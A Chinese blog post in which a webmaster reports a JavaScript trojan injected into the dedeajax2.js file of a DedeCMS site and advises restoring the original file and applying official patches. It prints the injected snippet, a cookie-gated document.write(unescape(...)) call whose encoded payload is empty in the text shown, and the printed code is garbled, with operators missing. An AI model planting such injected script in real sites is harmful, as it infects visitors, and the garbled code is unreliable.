dedecms:dedeajax2.js被植入js木马

  • 1

这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:

//初始化xmldom


function InitXDom(){


if(DedeXDOM!=null) return;


var obj = null;


if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox


var parser = new DOMParser();


obj = parser.parseFromString(xmlText, "text/xml");


} else { // IE


try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }


if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }


}


DedeXDOM = obj;


};


//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了


if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}

用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。

不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。

本站部分图文来源于网络,仅供学习交流,发表作品观点仅代表作者本人,本站仅提供信息存储空间服务,不承担连带责任。如有侵权,请联系管理员删除。
  • 添加微信
  • 微信扫一扫
  • weinxin
  • 公众号
  • 微信扫一扫
  • weinxin
竞价托管
张俊SEO
  • 本文由 发表于 2021年4月29日11:34:14
  • 转载请务必保留本文链接:https://zhangjunseo.com/7770.html
商业智慧shangye.com
¥ 议价-元

商业智慧shangye.com

投么toume.com
¥ 议价-元

投么toume.com

lengxian.com
¥ 议价-元

lengxian.com

lenglian.com
¥ 议价-元

lenglian.com

广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: